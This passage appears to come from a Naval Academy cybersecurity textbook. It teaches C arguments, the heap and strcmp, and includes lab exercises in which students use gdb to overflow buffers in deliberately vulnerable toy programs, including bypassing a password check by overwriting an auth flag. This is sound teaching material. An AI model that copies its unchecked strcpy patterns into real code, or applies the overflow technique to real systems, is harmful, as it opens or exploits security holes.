the responsibility for data integrity were taken away from the programmer and given to the compiler instead, the compiler
would consistently and constantly check that we never run beyond the bounds of an array (which is good), but program
execution would be much slower (which is bad). Generally, users want their programs (whether they be operating systems,
office software, application programs or games) to execute quickly. C executes quickly since the compiler does not verify data
integrity. Yet, with the responsibility for data integrity resting on the programmer's shoulders, buffer overflow errors can occur
if the programmer is not careful.
A good analogy is provided by USNA instructor Nick Rosasco: C is like a workbench with saws and power tools and highvoltage drops and spinning lathes all out in the open, without safeguards and protections. For a master craftsman who knows
his job very well, this environment would be ideal for productive work, with the understanding that the craftsman has to be
responsible for his safety. For the novice, this environment would be very dangerous.
Conversely, a workbench that required the user to constantly interact with multi-level interlocked protection mechanisms and
cumbersome safety features would be much safer for the novice, but would drive the skilled craftsman insane. As with work
benches, so with programming languages: The intentional lack of safety in C translates into greater flexibility and improved
performance… and risk.
In order for you to write your own buffer overflow attacks, we have to add a little bit to your C repertoire. For now, we have
to cover command line arguments and the exit command. It’ll be fun.
169
3. More Fun with C
3.1. Command Line Arguments. Up to this point, we have written the first line of the function main as
int main()
However, main is a function that we can pass arguments to. As we already know, main is special, and passing arguments to
the main function also takes place in a special way.
The main function is more formally written as
int main (int argc, char *argv[])
The parameter argc contains the number of arguments passed to main and the variable argv is an array of strings with each
argument passed stored in one of the array locations.
First, let’s get a little bit comfortable with this notation. If we type in the following program:
#include <stdio.h>
int main( int argc, char *argv[] )
{
int i;
printf("Arguments to this program, on the command-line:\n");
for( i = 0; i < argc; i = i + 1 )
printf("%s\n", argv[i]);
}
then, when executing it we would see the output below:
Here is what is happening. When you execute a C program, the operating system counts the total number of separate items
entered, and places that integer in the variable argc. Each separate item you entered is placed, as a string, one-by-one, in the
array of strings argv.
So, if I was to type: ./a.out
Then:
argv[0]=“./a.out”
one
2
3.45
./a.out
argv[1]=“one”
one
who?
2
3.45
argv[2]=“2”
and what is the value of argc? The answer: 5.
170
who?
argv[3]=“3.45”
argv[4]=“who?”
Practice Problem 7.5
For the following program invocation:
midshipman@EC310 ~$ ./a.out
wait
8
mate
(a) What is the value of argc?
(b) What is the value of argv[1]?
(c) What is the data type of argv[2]?
Solution: (a)
(b)
(c)
Practice Problem 7.6
Pertaining to taking in command line arguments for a program, choose the best description for argc .
(A) holds the number of command line arguments excluding the program name.
(B) holds the total number of command line arguments available to the program.
(C) holds the number of integer variables entered at the command line before the program begins.
(D) None of the above.
Solution:
Practice Problem 7.7
In the following sentence, circle the correct choices.
argv is a(n) array / index / stack used to store each command line parameter / index / argument in a binary / string /
numeric format.
Solution:
3.2. The exit statement. Sometimes we would like to intentionally terminate a program “gracefully” (instead of letting the
program crash and burn). This can be accomplished with an exit statement. When using the exit statement, we must add
the directive: #include<stdlib.h>. An example:
#include <stdio.h>
#include <stdlib.h>
int main()
{
float x, y;
printf( "This program divides x by y \n" );
printf( "Enter x and y: " );
scanf( "%f %f", &x, &y );
if( y == 0 )
{
printf( "Divide by 0!\n");
exit(1); //For us, it doesn’t matter what number we use
}
else
{
printf( "x/y is %f\n" , x/y);
}
}
171
172
Problems
1.
What features of the C language make a buffer overflow attack possible?
2.
Answer the following questions concerning how a program is stored in memory during its execution.
3.
(a)
Which segment of memory has contents that remain unchanged during program execution?
(b)
Does the programmer have complete control over how the stack is organized?
(c)
What is the relationship between the order in which variables appear in a function and the order in which
these same variables are stored in the function's stack frame?
(d)
What important registers are used to define the boundaries of a stack frame?
(e)
Suppose main calls a function named fun. After all the commands of fun have executed, how does the
program know to continue at the exact location in main where it left off?
(f)
Is a source code file permitted to have more than one function?
(g)
If your answer to (f) was "no", explain why that is the case. If your answer to (e) was "yes", explain how
the operating system knows where to begin executing your program if the source code file contains multiple
functions.
Segmentation Fault Carefully enter the following program using nano. Notice that the program has no blank lines.
#include<stdio.h>
void happy_times( int x , int y )
{
char alpha_code[ 7 ];
printf("\nEnter your alpha code:" );
scanf( "%s" , alpha_code );
printf("\nYour alpha code is: %s\n\n", alpha_code );
}
int main( )
{
int a = 77;
int b = 21;
happy_times( a , b);
}
Execute the program entering just the numeric portion of your alpha code. You should see something like this:
Now, rerun the program entering a ridiculously long alpha code. You should see a segmentation fault:
173
Recall that a segmentation fault occurs if a program attempts to run beyond the boundaries of main memory that the
operating system has allotted the program. In this homework problem we will explore in depth the cause of this
segmentation fault.
Let's run our program (which I've named happy.c) by entering:
gcc –g happy.c
gdb –q ./a.out
set dis intel
list main
break 13
run
nexti
nexti
nexti
nexti
Exactly four nexti's
If you now enter
i
r
eip
you should confirm that the next instruction that will execute is the instruction at address 0x8048419. If you now
enter
disass main
you should verify that the very next instruction is the function call. See the screen capture below.
The important point of all this is to note that you are still in main (but just barely!).
Recalling the generic picture of the stack, and noting that we have not yet arrived at the function call, the stack should
consist just of main's variables and the function's arguments.
(a)
Our goal is to locate main's variables and the function's arguments on the stack. Recall that main's variables (a and
b) will be stored in binary, which we can read as hexadecimal numbers. Convert the values of a and b to hexadecimal
174
and write these values below as eight hexadecimal digits (recall that integers are stored as four bytes, and four bytes
equates to eight hexadecimal digits) :
Note: For Parts (b) – (i) you will fill in the table which begins at the bottom of the next page.
(b)
Examine the value of the stack pointer ( i r esp ) and the base pointer ( i r ebp ). Fill in the values in the table
below, showing where the base pointer (label as EBP-main) and stack pointer (label as ESP-main) are pointing to.
(c)
Look at 40 bytes starting at the stack pointer by entering
x/40xb $esp
You should see:
This is the contents of memory location 0xbffff800
This is the contents of memory location 0xbffff801
This is the contents of memory location 0xbffff802
Locate main's variables and the function's arguments on the stack. Fill in the table, annotating the locations of these
four values. Label these as (main variable: a), (main variable b), (function argument: x) and (function argument:
y).
(d)
Now enter
break 2
continue
nexti
The program is now at the point where the old value of the base pointer and the correct return address have been
placed on the stack.
What should be stored as the correct return address? (Hint: enter disass main and determine the address of the
next instruction after the function call.)
What should be the saved value of the base pointer?
(e)
Examine the value of the stack pointer ( i r esp ). Fill in the values in the table below, showing the stack pointer's
location (label as ESP-main-revised).
(f)
Look at 40 bytes starting at the stack pointer by entering
x/40xb $esp
Locate the saved value of the base pointer and the return address on the stack. Fill in the table, annotating the locations
of these two items. Label these as (saved base pointer) and (return address).
175
(g)
Now enter
break 8
continue
When prompted to enter your alpha code, enter: AAAAAA
Examine the value of the stack pointer ( i r esp ) and the base pointer ( i r ebp ). Fill in the values in the table
below, showing where the base pointer (label as EBP-happy_times) and stack pointer (label as ESP-happy_times)
are pointing to.
(h)
Locate your alpha code in the stack frame for happy_times. Do this by examining 40 bytes starting at the stack
pointer. Note that the capital letter A is equivalent to hexadecimal 0x41. Fill in the table, annotating the location of
the string alpha_code. Note that the NULL that terminates the string is part of the string.
(i)
Now, examine your memory drawing. How many characters would you have had to enter for your alpha code before
you start to overwrite the saved value of the base pointer (remember that the NULL is automatically added)?
Overwriting the saved value of the base pointer will (almost always) cause a segmentation fault, because the program
will attempt to restore the stack to a location in memory outside the region of main memory given to the program.
(j)
Exit the debugger (by entering quit) and run your program by entering ./a.out. Enter an alpha code of size equal
to the number of characters you calculated in part (i). Did you get a segmentation fault? (You should have!)
(k)
Enter an alpha code of size one less than the number of characters you calculated in part (i). Did you get a
segmentation fault? (You should not have.)
Address
Value
Description
Address
Value
Description
BFFFF7CD
BFFFF7CE
BFFFF7CF
BFFFF7D0
BFFFF7D1
BFFFF7D2
BFFFF7D3
BFFFF7D4
BFFFF7D5
BFFFF7D6
BFFFF7D7
BFFFF7D8
BFFFF7D9
BFFFF7DA
BFFFF7DB
BFFFF7DC
BFFFF7DD
BFFFF7DE
BFFFF7DF
BFFFF7E0
BFFFF7E1
BFFFF7E2
BFFFF7E3
176
BFFFF7E4
BFFFF7E5
BFFFF7E6
BFFFF7E7
BFFFF7E8
BFFFF7E9
BFFFF7EA
BFFFF7EB
BFFFF7EC
BFFFF7ED
BFFFF7EE
BFFFF7EF
BFFFF7F0
BFFFF7F1
BFFFF7F2
BFFFF7F3
BFFFF7F4
BFFFF7F5
BFFFF7F6
BFFFF7F7
BFFFF7F8
BFFFF7F9
BFFFF7FA
BFFFF7FB
BFFFF7FC
BFFFF7FD
BFFFF7FE
BFFFF7FF
BFFFF800
BFFFF801
BFFFF802
BFFFF803
BFFFF804
BFFFF805
BFFFF806
BFFFF807
BFFFF808
BFFFF809
BFFFF80A
BFFFF80B
BFFFF80C
BFFFF80D
BFFFF80E
BFFFF80F
BFFFF810
BFFFF811
BFFFF812
BFFFF813
BFFFF814
BFFFF815
BFFFF816
BFFFF817
BFFFF818
BFFFF819
BFFFF81A
4.
Given the following code snippet:
char first_name[6] = “Alice”;
177
strcpy(first_name, “Alexander”);
(a) Will the C compiler state that there is an error?
(b) What potentially dangerous situation occurs because of the snippet above?
(c) What is the minimum size necessary for the array first_name to prevent this error?
(d) There are at least two ways to change the above code to prevent the above error from happening. Describe one.
5.
When the greetings function is called in main from the following code sample the stack pictured below is created.
#include<stdio.h>
void greetings()
{
int name_len = 15;
char name[name_len];
int year = 2014;
printf(“Enter your name: “);
scanf(“%s”, name);
printf(“Hello: %s! The current year is %d.\n”, name, year);
}
int main()
{
greetings();
}
Stack
year
name
name_len
prev_ebp
ret_addr
(a) Assuming there is no padding (extra spaces) when the frame is created, how many characters must the user enter
to overwrite only the first byte of the return address?
(b) Is it possible to change the value of year by performing a buffer overflow attack? Why or why not?
178
Security Exercise 7
Part 1. Initial Setup
Today you will use the program sx7.c which has been written for you and
placed in the ec310code directory.
Copy this file to the work directory by carefully entering the following at the
home directory prompt:
midshipman@EC310:~ $
cp
ec310code/sx7.c
Make sure you are at your home directory!
Most people give up just when
they're about to achieve success.
They quit on the one-yard line.
They give up at the last minute
of the game, one foot from a
winning touchdown. By the
way…who am I?
work
Enter this!
Verify that you have sx7.c in your work directory by changing to the work
directory:
cd work
and then listing the files in the work directory:
ls
If you do not have sx7.c in your work directory STOP and ask your
instructor or lab tech for help. Otherwise, proceed to Part 2.
Part 2. The Program
Use nano to examine the program sx7.c, which is also shown below:
#include<stdio.h>
#include<string.h>
#include <stdlib.h>
int main( int argc, char *argv[ ] )
{
char schoolone[ 5 ] ;
char schooltwo[ 5 ] ;
if( argc <= 2 )
exit(1);
strcpy(
strcpy(
schoolone , argv[ 1 ] );
schooltwo , argv[ 2 ] );
printf( "The best school is %s \n" , schoolone );
printf( "The second-best school is %s \n" , schooltwo );
}
Save your program ( Control-o ) and exit nano ( Control-x) and then compile your program using
gcc –g sx7.c
Before running your program, answer the following questions:
Question 1:
If I were to enter (but do not yet enter):
./a.out
Army
Navy
what would be the values of argc , argv[ 0 ], argv[ 1 ] and argv[ 2 ]?
179
Question 2:
If I were to enter (but do not yet enter):
./a.out
what would happen?
Now, run the program by entering:
./a.out
Make sure you understand the results.
Now run the program a second time by entering:
./a.out
Army
Navy
and again, make sure you understand what the program is doing.
If you do not understand the operation of the program, STOP and ask your instructor or lab tech for help. Otherwise, proceed
to Part 3.
Part 3. Your first experience at hacking!
Here is the background on this program: Your friend Cadet Lessheimer, who is attending USNA from the U.S. Military
Academy on an inter-service exchange program for the socially impaired, has written the program on the preceding page.
um… go army…??…
Cadet Lessheimer, USMA, Class of 2016
He says: “Let’s run my program! I’ll enter the name of my school and then you, my dear midshipman friend, will enter the
name of your school, and then we’ll see which school the program says is Number 1.”
Since Cadet Lessheimer goes first, and always puts in Army, the string Army will be placed in argv[1]. Since the program
copies argv[1] into schoolone, and then announces that schoolone is the best school, the program is designed so that
it will always say:
The best school is Army
The second-best school is (whatever the midshipman entered)
As you can see, he is named Cadet Lessheimer for a reason.
YOUR MISSION: HACK THE CADET’S PROGRAM!
Your hack should work as follows: Cadet Lessheimer runs the program and enters Army
and then let’s you enter your school. After you make your entry, the program prints out:
The best school is Navy
thus shocking the Cadet into a mind-numbing stupor.
180
Moreover, the output also provides an indication that the second best school is also Navy! Here is an example of how the
program's output might appear:
Note that you cannot make any changes to the C program!
So… how will you accomplish this? By designing a buffer overflow! (really… you will!)
Enter the following commands:
gcc –g sx7.c
gdb –q ./a.out
set dis intel
list
<Enter>
(Note that the reason for the second <Enter> above is to display the full program. Entering list will only display the first
ten lines of the program.)
Here is what you would like to accomplish: You want to examine the stack while the program is running, and determine if you
can overwrite the cadet's entry by using a buffer overflow. Looking at the program listing, we see:
STEP 1: Determine the proper breakpoint for your program.
You want the program to run up to a certain point, then freeze at a breakpoint, allowing you to examine the stack. Where
should you set the breakpoint? Looking at the figure above, setting the breakpoint at line 2 would clearly be worthless, since
nothing significant has occurred by that line of the program. You want to set the breakpoint to be at a point after the command
line arguments (i.e., the cadet's entry which is Army, and your entry) are on the stack.
Question 3:
Where should you set the breakpoint?
STOP and show your instructor or lab tech your answer to Question 3. With their okay, proceed to Step 2 below.
181
STEP 2: Run to the breakpoint and examine the stack.
To enter a breakpoint for a program that requires command line arguments (where, let’s say, the command line arguments are
Army and Navy, you would enter:
break <whatever number you have for Question 3>
run Army Navy
For example, if you answered Question 3 by deciding the breakpoint should be at line 4, you would enter:
break 4
run Army
Navy
Now, examine the stack by entering
i r esp
i r ebp
Question 4:
How many bytes are on the stack?
Examine the stack by entering:
x/60xb
$esp
Question 5:
Label, in the Description column, the locations of the addresses to which main's stack and base
pointer point. Label the base pointer as EBP-main and the stack pointer as ESP-main.
Question 6:
Locate on the stack the location of where the two command line arguments are stored. Recall that
the program copies argv[1] into schoolone and argv[2] into schooltwo. Show these on
the table below, labeling them as schoolone – cadet's entry and as schooltwo – midshipman's
entry .
STEP 3: Determine the attack technique.
Question 7:
Based on your picture of the stack, which is true (a or b):
(a) If schoolone is long enough, it can overwrite schooltwo
(b) If schooltwo is long enough, it can overwrite schoolone
Question 8:
Based on your picture of the stack, design your buffer overflow. Write a clear explanation of how
your attack works in the answer space for Question 8.
Question 9:
Demonstrate your buffer overflow attack during a run of the program. Your instructor or lab tech
will sign off on this.
182
183
184
Security Exercise 7 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5 and Question 6:
Address
Value
BFFFF7CD
BFFFF7CE
BFFFF7CF
BFFFF7D0
BFFFF7D1
BFFFF7D2
BFFFF7D3
BFFFF7D4
BFFFF7D5
BFFFF7D6
BFFFF7D7
BFFFF7D8
BFFFF7D9
BFFFF7DA
BFFFF7DB
BFFFF7DC
BFFFF7DD
BFFFF7DE
BFFFF7DF
BFFFF7E0
BFFFF7E1
BFFFF7E2
BFFFF7E3
BFFFF7E4
BFFFF7E5
BFFFF7E6
BFFFF7E7
BFFFF7E8
BFFFF7E9
BFFFF7EA
BFFFF7EB
BFFFF7EC
BFFFF7ED
BFFFF7EE
BFFFF7EF
BFFFF7F0
BFFFF7F1
BFFFF7F2
185
Description
Address
Value
Description
BFFFF7F3
BFFFF7F4
BFFFF7F5
BFFFF7F6
BFFFF7F7
BFFFF7F8
BFFFF7F9
BFFFF7FA
BFFFF7FB
BFFFF7FC
BFFFF7FD
BFFFF7FE
BFFFF7FF
BFFFF800
BFFFF801
BFFFF802
BFFFF803
BFFFF804
BFFFF805
BFFFF806
BFFFF807
BFFFF808
BFFFF809
BFFFF80A
BFFFF80B
BFFFF80C
BFFFF80D
BFFFF80E
BFFFF80F
BFFFF810
BFFFF811
BFFFF812
BFFFF813
BFFFF814
BFFFF815
BFFFF816
BFFFF817
BFFFF818
BFFFF819
BFFFF81A
Question 7:
Question 8:
Question 9: When you have successfully hacked the cadet's program, show your instructor or Lab tech. Your instructor/tech
will sign your answer sheet.
_________________________________
Instructor or Lab Tech signature
186
Chapter 8: The Heap
Objectives:
(a) Explain the purpose of the heap and describe how memory on the heap is allocated.
1. The Heap
1.1 Introduction. We mentioned a few chapters back the fact that when a program is to be executed, the OS reserves a block
of main memory for the program’s use. This block of memory is then partitioned into segments.
The “text” segment holds the actual program (the machine language instructions which we can view as assembly-language
instructions.) The “stack” segment is the memory that the program has available to store information during execution. For
example, the program’s variables are stored on the stack.
The above picture is full and complete for the programs that we have dealt with up to this point. But the above picture is
lacking as a full description for more general programs.
Once a C program is compiled and the corresponding machine code generated, the amount of space for the text segment is
fixed. Similarly, the compiler knows about all variables that we declare in our program, so the compiler can make room for
these variables on the stack as soon as the function that uses these variables is invoked. The precise placement of data on the
stack is completely controlled by the compiler.
Oftentimes when we run a program, we will want to use memory that cannot be anticipated in advance by the compiler (if the
compiler had anticipated it, it would have reserved space for it on the stack). For example, suppose we want our program to
use an array of characters, but the size of the array is a value that the user will enter at the keyboard while the program is
running. The compiler cannot, in advance, predict the size of the array, since the size will depend on whatever value the user
happens to enter.
So, we need an additional segment of memory available for the programmer to directly control. This additional segment is
called the heap. The heap, like the stack, varies in size—it will grow and shrink based on the memory needs of the user as the
program is running. The heap and the stack, in fact, grow towards each other.
187
Note that the total space allocated for the heap and the stack is fixed so, in a sense, the heap and the stack compete with each
other for space. As items are added to the heap, the size of the heap grows and the "bottom of the heap" moves to a higher
memory address. As items are added to the stack, the size of the stack grows and the "top of the stack" moves to a lower
memory address.
Practice Problem 8.1
Consider the picture above, showing program 1 in memory.
(a) How does the CPU keep track of the program's proper location within the text segment?
(b) How does the CPU keep track of where the stack is located in main memory?
Solution: (a)
(b)
1.2 Heap Allocation. The preceding question might leave you wondering: How does the CPU keep track of where the heap
is located in main memory? The answer to this question is: It doesn't. It is up to the programmer to keep track of the heap.
The point bears repeating: The compiler takes care of the stack, YOU (the programmer) must take care of the heap.
To allocate memory on the heap, we use the malloc function. We tell the malloc function the number and type of the
space we need (e.g., “space for 6 integers” or “space for 25 characters”) and malloc returns a pointer to the start of the
memory that is allocated on the heap for this purpose.
For example, to allocate space for 6 integers (which requires 24 bytes), we would use:
int *ptr1 ;
ptr1 = (int *) malloc(24) ;
After these two lines of code execute, ptr1 will hold the address to space on the heap for six integers. Note that the argument
to the malloc function is the number of bytes we would like to allocate on the heap.
Practice Problem 8.2
Write a snippet of C code that will allocate space on the heap for 25 characters.
Solution:
188
Practice Problem 8.3
Which segment of memory is physically highest (i.e., has the smallest addresses)?
(a) Heap
(b) Stack
(c) Text Segment
(d) Registers
Solution:
Practice Problem 8.4
In which direction does the heap grow?
(a) From the bottom (larger memory address) up (to a smaller memory address).
(b) From the top (smaller memory address) down (to a larger memory address).
(c) It depends on the corresponding number and types of variables currently allocated on the stack.
(d) It depends on the prolonged effects of solar and liquescent additives combined with the chemical makeup of the
heap.
Solution:
This whole notion of using the heap may seem mysterious, so let's look in gory detail at an example. Our goal is to write a
program that accepts, as command line arguments, a number of bytes to allocate on the heap (to hold character data), and a text
string to place in that newly allocated memory.
For example, if we executed our program (./a.out) with command line arguments as shown:
midshipman@EC310-VM:~ $
./a.out
10
cyber2
the program would allocate 10 bytes on the heap, store the characters "cyber2" at this location, and output a message telling
us the starting address for our 10 byte allocation (the address that will contain the c in "cyber2").
Here is the program to accomplish this. We will examine the program line-by-line.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include<stdio.h>
#include<string.h>
What in blazes is
atoi on line 10?
int main( int argc , char *argv[ ] )
{
char *ptr ;
int size;
size = atoi( argv[ 1 ] ) ;
Do not fear! All will
be explained below!
ptr = ( char* ) malloc( size );
strcpy( ptr , argv[ 2 ] );
printf("\nThe following is stored on the heap at address %x:", ptr);
printf( "%s \n\n" , ptr );
free( ptr ) ;
}
189
Practice Problem 8.5
When we run the program above by entering: ./a.out
(a)
(b)
(c)
10
cyber2
What is the value of argc?
What are the values of argv[ 1 ] and argv[ 2 ] ?
What are the types of argv[ 1 ] and argv[ 2 ] ?
Solution:
(a)
(b)
(c)
On line 6 we declare a pointer to a character named ptr. Our intent (as we will soon see) is that ptr will point to the first
character in a string of characters.
On line 8 we declare an integer named size, and then on line 10 we set size to be equal to the integer value of argv[1].
Recall that the intent of the second command line argument, argv[ 1 ], is to specify the number of bytes that we wish to
reserve on the heap. We want to reserve 10 bytes on the heap, so we typed in 10 as the second command line argument. It is
important to remember, though, that all command line arguments are stored as strings. So we have to convert argv[1] to an
integer. You can convert a string to an integer using the function atoi (which stands for ASCII to integer).
Line 12 then reserves 10 bytes on the heap, and stores the starting address of the first byte in ptr. At this point, the programs
memory is as follows:
Line 14 then copies the string argv[2] into the memory starting at ptr. After line 14, the program's memory looks as
follows:
190
On lines 16 and 18 we print out the address of argv[2] on the heap. Here is the output:
So we can refine the picture of this program in memory:
There is one last (important!) point about the heap. If our program no longer needs memory that was allocated on the heap, it
should free it up so that it can be reused. This is done with the free function. For example, to free the heap memory in the
prior program, we would use the line of code:
free( ptr ) ;
So, our final program includes line 20.
Practice Problem 8.6
Suppose we run the program shown above with the debugger, and set a breakpoint at line 16. Which of the following is a
possible value stored in the instruction pointer eip?
(a)
0x0804848c
(b)
0xbffff810
(c)
0x0804a010
Solution:
Practice Problem 8.7
Suppose we run the program shown above with the debugger, and set a breakpoint at line 16. Which of the following is a
possible address for where the variable size is stored?
(a)
0x0804848c
(b)
0xbffff810
(c)
0x0804a010
Solution:
Practice Problem 8.8
The above picture of the stack shows that the variable size is stored "above" (i.e., at lower memory) than ptr. How do we
know that this must be the case?
Solution:
191
For this chapter's security exercise, we have to add a little bit to your C repertoire. For now, we have to cover the string
compare command and the syntax for passing an array as an argument to a function. It’ll be fun.
2. More Fun with C
2.1. A new string command Recall earlier that we were able to enter or change the value of strings using the strcpy
command. Specifically, the command
strcpy( s1 , s2 );
copies the string s2 to the string s1. Another useful command is the string compare command, strcmp. The command
value = strcmp( s1
, s2 );
Compares the strings s1 and s2 character by character. The function returns an integer greater than zero if s1 > s2 and
returns an integer less than zero if s1 < s2. Perhaps most importantly, the function returns zero if the two strings are equal
(i.e., identical). To use these functions, you must have the preprocessor directive:
#include <string.h>
Practice Problem 8.9
What is the output of the following program?
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int
{
char
char
char
char
argc, char *argv[])
string1[
string2[
string3[
string4[
]
]
]
]
=
=
=
=
"Happy" ;
"Joyous" ;
"Happy Times" ;
"Happy" ;
if(strcmp( string1 , string2 ) == 0)
printf("\n String 1 and String 2 match\n");
else
printf("\nString 1 and String 2 do NOT match\n");
if(strcmp( string1 , string3 ) == 0)
printf("\nString 1 and String 3 match\n");
else
printf("\nString 1 and String 3 do NOT match\n");
if(strcmp( string1 , string4 ) == 0)
printf("\nString 1 and String 4 match\n\n");
else
printf("\nString 1 and String 4 do NOT match\n");
}
Solution:
192
2. Passing an array to a function To pass an array to a function we use the array name as an argument. In the function
header, though, the type must be a pointer, since an array name is an address.
For example, suppose we had a string (an array of characters) declared as
char name[ 10 ];
and we wanted to pass this array (as the only argument) to a void function named fun. Then the function call would be
fun( name );
and the first line of the function definition would be
void fun( char *input )
Thus, the argument (name) is passed to a parameter (input) which is a pointer to an array of characters.
193
194
Problems
1.
Suppose I have a C source-code file midshipman.c that creates a pointer to a character buffer as follows to store
each student’s alpha code:
char *alpha_ptr;
2.
(a)
What must I type to allocate 20 bytes on the heap for this string?
(b)
After the midshipman graduates and this string is no longer needed, what instruction would a responsible
programmer include at the end of the program?
(c)
Why is it a good idea to include the instruction that you noted in question (b) above?
Your friend is writing a program that takes two command line arguments (aside from ./a.out). The idea behind
the program is that the user is to provide the number of bytes to allocate on the heap, and a string to place on the heap.
For example, if the user enters
./a.out
100
cyber2
then the program should allocate 100 bytes on the heap and place the string cyber2 on the heap. However, when
your friend runs the program, it seems to execute for 30 seconds or so, and then presents a very unpleasant message:
Your friend knows that you are a genius taking the Cyber-2 course, so she has asked you for help. Her program is
shown below. Enter the following program and run it. What is causing your friend's program to crash?
#include<stdio.h>
#include<string.h>
int main( int argc , char *argv[ ] )
{
char *ptr ;
int size;
int i;
size = atoi( argv[ 1 ] ) ;
for(i=0; i=size; i=i+1)
{
ptr = ( char* ) malloc( size );
strcpy( ptr , argv[ 2 ] );
}
}
3.
Explain, in your own words, how a buffer overflow occurs in memory.
4.
Given the following variable declarations and stack diagram (no padding) for a game:
char user[16];
int
highscore;
char nickname[x];
Address
Value
0xbffff800->
0xbffff80c->
0xbffff810->
0xbffff820->
0xbffff824->
1000
lynn
0xbffff840
0x080483e0
Variable
<-nickname
<-highscore
<-user
<-Saved ebp
<-Return Address
This program allows you to enter your nickname when you run it from the command line.
./game nickname
(a)
What is the value of ‘x’? (# of bytes allocated for nickname)
195
5.
(b)
How many bytes must you put into nickname to completely overwrite highscore?
(c)
How could you change the above variable declarations to ensure highscore could not be overwritten?
(d)
What is the minimum number of bytes that you can put into nickname to crash the program?
(e)
What string can you put into nickname to overwrite highscore with value 16963?
Is it possible for the heap and stack to collide? Choose the answer below which most correctly answers this question:
(a)
Yes, because the stack builds from the bottom (larger memory address) up (to a smaller memory address)
and the heap from the top (smaller memory address) down (to a larger memory address).
(b)
Yes, because the heap builds from the bottom (larger memory address) up (to a smaller memory address) and
the stack from the top (smaller memory address) down (to a larger memory address).
(c)
No, because the stack builds from the bottom (larger memory address) up (to a smaller memory address) and
the heap from the top (smaller memory address) down (to a larger memory address).
(d)
No, because the heap builds from the bottom (larger memory address) up (to a smaller memory address) and
the stack from the top (smaller memory address) down (to a larger memory address).
196
Security Exercise 8
There are people who make things
happen, there are people who
watch things happen, and there are
people who wonder what
happened. To be successful, you
need to be a person who makes
things happen.
Looks like we
have a problem.
Who am I?
Part 1. Background and Initial Setup
USMA Exchange Cadet Lessheimer and his friend, Exchange Cadet Geekenstein, have written a program to control access to
the USMA Knowledge Database (which is a very small text file).
The idea is this: To be granted access to the USMA Knowledge Database, when you run the program you also enter a password
on the command line. If you enter a valid password, you are granted access. If you enter an invalid password you are denied
access.
You start by surreptitiously looking in the trash can outside the cadet’s room. Amidst the candy-bar wrappers, Doritos bags
and empty Kool-Aid containers, you find a piece of paper labeled SECRET SOURCE CODE. Looking at the paper, you see
the program below:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int check_password( char *password )
{
int auth_flag = 0;
char password_buffer[16];
strcpy( password_buffer, password );
if(strcmp( password_buffer, "donkey" ) == 0)
auth_flag = 1;
if(strcmp( password_buffer, "gousma" ) == 0)
auth_flag = 1;
return auth_flag;
}
197
int main(int argc, char *argv[])
{
if(argc < 2)
exit(0);
if ( check_password( argv[1] )
== 0 )
printf("\n\n
Access Denied.\n\n");
else
printf("\n\n
Access Granted.\n\n");
}
You have typed this program into the file named accesscontrol.c . To save you the trouble of typing, we have already
placed this file on your machine in the EC310 folder under your home directory.
Copy this file to the work directory by carefully entering the following at the home directory prompt:
midshipman@EC310:~ $
cp
ec310code/accesscontrol.c
Make sure you are at your home directory!
work
Enter this!
Verify that you have accesscontrol.c in your work directory by changing to the work directory:
cd work
and then listing the files in the work directory:
ls
If you do not have accesscontrol.c
Otherwise, proceed to Part 2.
in your work directory STOP and ask your instructor or lab tech for help.
Part 2. Gaining Access by Buffer Overflow
Before compiling and executing the program, let's first see if we can understand its operation.
Suppose I were to run the program (./a.out) by entering at the command line:
midshipman@EC310-VM:~ $ ./a.out Navy
Question 1.
If I ran the program as above, what would be the value of argc?
Question 2.
If I ran the program as above, what would be the value of argv[0]?
Question 3.
If I ran the program as above, what would be the value of argv[1]?
Question 4.
Where does this program begin executing?
Question 5.
What is the purpose of the two lines:
if(argc < 2)
exit(0);
Question 6.
In main, what is the value of the argument that we give to the function named
check_password? (Recall our input as depicted in the command line shown above.)
Question 7.
What happens in main if the function named check_password returns a value of 0?
198
Question 8.
What happens in main if the function named check_password returns a value other than 0?
Question 9.
Finish this sentence: The function check_password returns the value of the variable named
auth_flag. For access to be denied in main, the value of auth_flag that is returned must
be equal to ____.
Question 10.
Let's look at the function check_password . After the line of code:
strcpy( password_buffer, password );
executes, what will be stored in password_buffer?
Recall that the function string compare , strcmp, in the generic line of code
value = strcmp( s1
, s2 );
Compares the strings s1 and s2 character by character. The function returns zero if the two strings are equal (i.e., identical).
Question 11.
Recalling our presumption that you entered at the command line:
midshipman@EC310-VM:~ $ ./a.out Navy
will either of the two strcmp operations in the function check_password return a value of
zero?
Question 12.
Will the function check_password return to main a value equal to zero, or will it return
something other than zero?
Question 13. If you enter at the command line:
midshipman@EC310-VM:~ $ ./a.out Navy
what message will be sent to the screen?
At this point, if you are confused by the operation of the program (on paper), ask your instructor for help.
Let's now compile the program:
gcc –g
accesscontrol.c
and run the program. Try out executing the program with a few different command line inputs. You should see that the two
secret passwords that will allow access are donkey and gousma . So, you can enter one of these passwords and gain
access!
But that is not your goal. The cadets might, in the future, change their passwords, in which case you will have to try to find a
new version of the source code. Your goal is to find a way to hack the cadet's program so that even if they change the passwords
you will be able to gain access.
Determine a password that you can enter that will always allow access, regardless of the actual passwords being used by the
cadets!
Enter the following commands:
gcc –g accesscontrol.c
gdb –q ./a.out
set dis intel
list check_password
<Enter>
list main
<Enter>
199
Here is what you would like to accomplish: You notice that in the function check_password, the variable auth_flag is
initially set to zero. The only way auth_flag is ever changed is if we enter the correct password. But… perhaps we can
change the value of auth_flag by executing a buffer overflow without needing to worry about the correct password!!!
Perhaps the incorrect password you enter as the command line argument can be used to change the value of auth_flag !!!
STEP 1: Determine the proper breakpoint for your program.
You want the program to run up to a certain point, then freeze at a breakpoint, allowing you to examine the stack. Where
should you set the breakpoint? Looking at the listing on your screen, you want to set the breakpoint to be at a point where you
can examine how the command line argument (i.e., what you enter as the pretend password) is situated with respect to the
variable auth_flag.
Question 14:
Where should you set the breakpoint?
STOP and show your instructor or lab tech your answer to Question 14. With their okay, proceed to Step 2 below.
STEP 2: Run to the breakpoint and examine the stack.
To enter a breakpoint for a program that requires command line arguments (where, let’s say, the command line argument is
Navy, you would enter:
break <whatever number you have for Question 14>
run Navy
For example, if you answered Question 14 by deciding the breakpoint should be at line 4, you would enter:
break 4
run Navy
Now, examine the stack by entering
i r esp
i r ebp
Question 15:
How many bytes are on the stack?
Question 16:
Whose stack frame is this anyway? Is this the stack frame for main?
Examine the stack by entering
